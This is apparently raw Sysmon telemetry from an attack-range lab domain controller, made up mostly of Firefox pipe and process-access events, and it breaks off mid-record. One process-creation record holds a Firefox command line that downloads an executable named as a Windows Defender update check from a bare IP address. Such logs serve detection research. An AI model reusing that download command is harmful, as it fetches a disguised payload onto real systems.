17141700x800000000000000043467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-CreatePipe2023-01-18 12:22:59.100{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko.3240.6744.18347881689759297914C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.098{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+1ab6bf1|C:\Program Files\Mozilla Firefox\xul.dll+1ab4ec7|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.098{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\chrome.3240.2.98790250C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.093{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406716C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+10a7bb|C:\Program Files\Mozilla Firefox\xul.dll+130eca0|C:\Windows\SYSTEM32\ntdll.dll+7f61d|C:\Windows\SYSTEM32\ntdll.dll+3a800|C:\Windows\SYSTEM32\ntdll.dll+1ed13|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 18141800x800000000000000043463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-ConnectPipe2023-01-18 12:22:59.093{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240\gecko-crash-server-pipe.3240C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000043462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.070{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A2-63C7-4906-00000000AF02}6604C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+f68f92|C:\Program Files\Mozilla Firefox\xul.dll+b7bf9e|C:\Program Files\Mozilla Firefox\xul.dll+24922f|C:\Program Files\Mozilla Firefox\xul.dll+248fba|C:\Program Files\Mozilla Firefox\xul.dll+f858cd|C:\Program Files\Mozilla Firefox\xul.dll+1095b87|C:\Program Files\Mozilla Firefox\xul.dll+e63e24|C:\Program Files\Mozilla Firefox\xul.dll+c2d528|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568 10341000x800000000000000043461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.068{FE4C2B44-E4A2-63C7-4806-00000000AF02}32405364C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+269b6|C:\Program Files\Mozilla Firefox\xul.dll+e8dca7|C:\Program Files\Mozilla Firefox\xul.dll+e87879|C:\Program Files\Mozilla Firefox\xul.dll+e77459|C:\Program Files\Mozilla Firefox\xul.dll+e7653c|C:\Program Files\Mozilla Firefox\xul.dll+e78bb2|C:\Program Files\Mozilla Firefox\xul.dll+c2d887|C:\Program Files\Mozilla Firefox\xul.dll+c2ac3d|C:\Program Files\Mozilla Firefox\xul.dll+24fe6b|C:\Program Files\Mozilla Firefox\xul.dll+24f993|C:\Program Files\Mozilla Firefox\xul.dll+105ab0f|C:\Program Files\Mozilla Firefox\xul.dll+1882709|C:\Program Files\Mozilla Firefox\xul.dll+1880b50|C:\Program Files\Mozilla Firefox\xul.dll+c2d021|C:\Program Files\Mozilla Firefox\xul.dll+236871|C:\Program Files\Mozilla Firefox\xul.dll+ce82ce|C:\Program Files\Mozilla Firefox\xul.dll+1870580|C:\Program Files\Mozilla Firefox\xul.dll+1822181|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf|C:\Program Files\Mozilla Firefox\xul.dll+1e7190e|C:\Program Files\Mozilla Firefox\xul.dll+1822568|C:\Program Files\Mozilla Firefox\xul.dll+1d02fbf 10341000x800000000000000043460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.064{FE4C2B44-E4A2-63C7-4806-00000000AF02}32406744C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\Mozilla Firefox\xul.dll+9e834a|C:\Program Files\Mozilla Firefox\xul.dll+ebac4|C:\Program Files\Mozilla Firefox\xul.dll+2581e76|C:\Program Files\Mozilla Firefox\xul.dll+1ab508d|C:\Program Files\Mozilla Firefox\xul.dll+12705|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+12237|C:\Program Files\Mozilla Firefox\xul.dll+9cdfc1|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.059{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.059{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.058{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.058{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.058{FE4C2B44-DDF4-63C7-A004-00000000AF02}4700692C:\Windows\system32\csrss.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000043454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.057{FE4C2B44-E4A2-63C7-4806-00000000AF02}32407044C:\Program Files\Mozilla Firefox\firefox.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+6e193|C:\Windows\System32\ADVAPI32.dll+188af|C:\Program Files\Mozilla Firefox\firefox.exe+ac12|C:\Program Files\Mozilla Firefox\firefox.exe+6673|C:\Program Files\Mozilla Firefox\xul.dll+7a8fbe|C:\Program Files\Mozilla Firefox\xul.dll+9e365b|C:\Program Files\Mozilla Firefox\xul.dll+9e1625|C:\Program Files\Mozilla Firefox\xul.dll+9e934e|C:\Program Files\Mozilla Firefox\xul.dll+82fb43|C:\Program Files\Mozilla Firefox\xul.dll+17e59b8|C:\Program Files\Mozilla Firefox\xul.dll+17d1c3b|C:\Program Files\Mozilla Firefox\xul.dll+9d10af|C:\Program Files\Mozilla Firefox\xul.dll+1f57e|C:\Program Files\Mozilla Firefox\xul.dll+833d37|C:\Program Files\Mozilla Firefox\nss3.dll+7318c|C:\Program Files\Mozilla Firefox\nss3.dll+885b1|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Program Files\Mozilla Firefox\mozglue.dll+1f968|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000043453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.058{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe109.0FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3240.2.987902509\154636061" -childID 1 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 26775 -prefMapSize 234522 -jsInitHandle 1108 -jsInitLen 246772 -a11yResourceId 64 -parentBuildID 20230112150232 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0f46d9cd-4a61-4363-b607-81b1c1fb5b15} 3240 "\\.\pipe\gecko-crash-server-pipe.3240" 2668 1d9752fa158 tabC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\ATTACKRANGE\Administrator{FE4C2B44-DDF6-63C7-BDF1-300000000000}0x30f1bd2LowMD5=66A6B001D806D3117BBA41DD55C08DE0,SHA256=0FC5FD25E5CB032AF0E867B74AD8FCB3A0F5803F3C661E398D5A03448C5CA946,IMPHASH=B9CD654B3D499FE4AD9B5E6D464FD125{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url http://45.139.105.143/d/rsWinDefendUpdateCheck.exe 10341000x800000000000000043452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.057{FE4C2B44-D9F5-63C7-1200-00000000AF02}7565760C:\Windows\System32\svchost.exe{FE4C2B44-E4A3-63C7-4B06-00000000AF02}500C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.056{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.056{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043449Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.056{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.056{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043447Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.056{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043446Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.055{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043445Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.055{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043444Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.055{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043443Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.055{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043442Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.055{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\system32\lsasrv.dll+77ccc|C:\Windows\system32\lsasrv.dll+e79f4|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000043441Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:59.055{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624676C:\Windows\system32\lsass.exe{FE4C2B44-E4A2-63C7-4806-00000000AF02}3240C:\Program Files\Mozilla 